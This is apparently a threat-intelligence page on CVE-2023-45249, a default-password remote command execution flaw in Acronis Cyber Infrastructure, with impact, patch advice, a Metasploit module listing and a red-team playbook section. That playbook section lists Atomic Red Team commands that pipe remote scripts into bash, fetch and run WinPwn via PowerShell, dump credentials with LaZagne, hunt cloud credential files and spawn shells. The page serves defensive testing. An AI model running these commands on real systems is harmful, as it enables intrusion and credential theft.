CVE-2023-45249
Overview
This vulnerability is a remote command execution flaw caused by the use of default passwords in Acronis Cyber Infrastructure (ACI). The root cause lies in the authentication mechanism that accepts default credentials without enforcing password changes. The affected component is the authentication interface of multiple ACI builds prior to 5.0.1-61, 5.1.1-71, 5.2.1-69, 5.3.1-53, and 5.4.4-132, which allows unauthorized remote access.
Vulnerability Description
Remote command execution due to use of default passwords. The following products are affected: Acronis Cyber Infrastructure (ACI) before build 5.0.1-61, Acronis Cyber Infrastructure (ACI) before build 5.1.1-71, Acronis Cyber Infrastructure (ACI) before build 5.2.1-69, Acronis Cyber Infrastructure (ACI) before build 5.3.1-53, Acronis Cyber Infrastructure (ACI) before build 5.4.4-132.
Impact
An attacker with network access can authenticate using default credentials without user interaction or prior access, enabling execution of arbitrary commands remotely. This can lead to full system compromise, including unauthorized control over infrastructure components, data manipulation, and potential lateral movement within the environment. The vulnerability enables attackers to bypass authentication controls and escalate privileges, resulting in significant operational and data security breaches.
Solution
Acronis has released patches addressing this vulnerability in builds 5.0.1-61, 5.1.1-71, 5.2.1-69, 5.3.1-53, and 5.4.4-132 as detailed in advisory SEC-6452. Users should update Acronis Cyber Infrastructure to these or later builds immediately. For detailed patching instructions and update procedures, refer to the vendor advisory at https://security-advisory.acronis.com/advisories/SEC-6452.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability in Acronis Cyber Infrastructure arises from the use of default passwords, which can lead to remote command execution. This flaw allows an unauthorized attacker to gain administrative access to the affected systems without needing to authenticate properly. The presence of default credentials in software is a well-known security risk, as these passwords are often documented and easily discoverable. In this case, the vulnerability affects multiple builds of Acronis Cyber Infrastructure, highlighting a systemic issue that could compromise the security posture of organizations relying on this software for data protection and infrastructure management.
Attack vectors for this vulnerability are straightforward, primarily involving network-based exploitation. An attacker can leverage the default credentials to access the management interface of the affected Acronis products over the internet. Once inside, the attacker can execute arbitrary commands, potentially leading to data exfiltration, system manipulation, or further lateral movement within the network. Scenarios may include a targeted attack against organizations that have not changed the default passwords, or opportunistic scanning of exposed services on the internet, where attackers can automate the exploitation process. The simplicity of this attack method, combined with the high potential impact, makes it particularly concerning.
The real-world impact of this vulnerability can be severe. Organizations that utilize Acronis Cyber Infrastructure for critical data storage and management may find themselves at risk of significant data breaches or operational disruptions. The potential for remote command execution means that attackers could not only steal sensitive information but also alter or delete critical data, leading to compliance violations and financial losses. Furthermore, the reputational damage associated with a successful exploit could deter clients and partners, impacting business relationships and future revenue streams. Given the high CVSS score of 9.8, the urgency for organizations to address this vulnerability is paramount.
To detect and mitigate this vulnerability, organizations should first conduct a thorough inventory of their Acronis Cyber Infrastructure deployments to identify any instances still using default passwords. Regular security audits and vulnerability assessments should be implemented to ensure that all systems are updated to the latest builds, which include patches for this vulnerability. Additionally, organizations should enforce strong password policies and implement multifactor authentication where possible to reduce the risk of unauthorized access. Network segmentation and monitoring can also help detect unusual activity that may indicate an attempted exploitation of this vulnerability.
In conclusion, the vulnerability stemming from default passwords in Acronis Cyber Infrastructure presents a significant threat to organizations utilizing this software. The potential for remote command execution poses a high risk, necessitating immediate action to secure affected systems. By understanding the nature of the vulnerability, recognizing the various attack vectors, assessing the potential real-world impacts, and implementing robust detection and mitigation strategies, organizations can better protect themselves against this and similar threats in the future. Cybersecurity is an ongoing process, and vigilance is essential in maintaining a secure environment.
CSURFACE threat intelligence has detected a marked escalation in exploitation attempts targeting CVE-2023-45249, reflecting a significant uptick in attacker interest and activity. Although the EPSS score remains stable with a slight downward adjustment, our telemetry indicates a sharp increase in detection events, suggesting adversaries are actively leveraging the default password vulnerability in Acronis Cyber Infrastructure. This heightened activity underscores the vulnerability’s attractiveness as an attack vector, particularly given its potential for remote command execution and root-level access via exposed PostgreSQL and SSH services. The emergence of publicly available Metasploit modules further lowers the barrier for exploitation, increasing the likelihood of opportunistic attacks. While ransomware group involvement remains unconfirmed, the critical severity and ease of exploitation maintain this vulnerability as a high-risk threat. Defenders should interpret this surge as an indicator of increased targeting and prioritize monitoring for related indicators of compromise accordingly.
Affected Products (5)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Acronis | Cyber Infrastructure | All |
cpe:2.3:a:acronis:cyber_infrastructure:*:*:*:*:*:*:*:*
|
|
|
Acronis | Cyber Infrastructure | All |
cpe:2.3:a:acronis:cyber_infrastructure:*:*:*:*:*:*:*:*
|
|
|
Acronis | Cyber Infrastructure | All |
cpe:2.3:a:acronis:cyber_infrastructure:*:*:*:*:*:*:*:*
|
|
|
Acronis | Cyber Infrastructure | All |
cpe:2.3:a:acronis:cyber_infrastructure:*:*:*:*:*:*:*:*
|
|
|
Acronis | Cyber Infrastructure | All |
cpe:2.3:a:acronis:cyber_infrastructure:*:*:*:*:*:*:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
Metasploit (1)
| Module | Authors | Rank | Platform | Link |
|---|---|---|---|---|
|
Acronis Cyber Infrastructure default password remote code execution
exploits/linux/http/acronis_cyber_infra_cve_2023_45249
|
- | Unknown | unix, linux | View |
Threat Feed
6 eventsSighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog
Public exploit code is available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns
No CAPEC pattern mapped to this CVE.
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (4)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2023-45249 |
| security-advisory.acronis.com |
GitHub CVE
vendor-advisory
|
https://security-advisory.acronis.com/advisories/SEC-6452 |
| securityweek.com |
GitHub CVE
|
https://www.securityweek.com/acronis-product-vulnerability-exploited-in-the-wild/ |
| cisa.gov |
NVD API
Third Party Advisory
US Government Resource
|
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2023-45249 |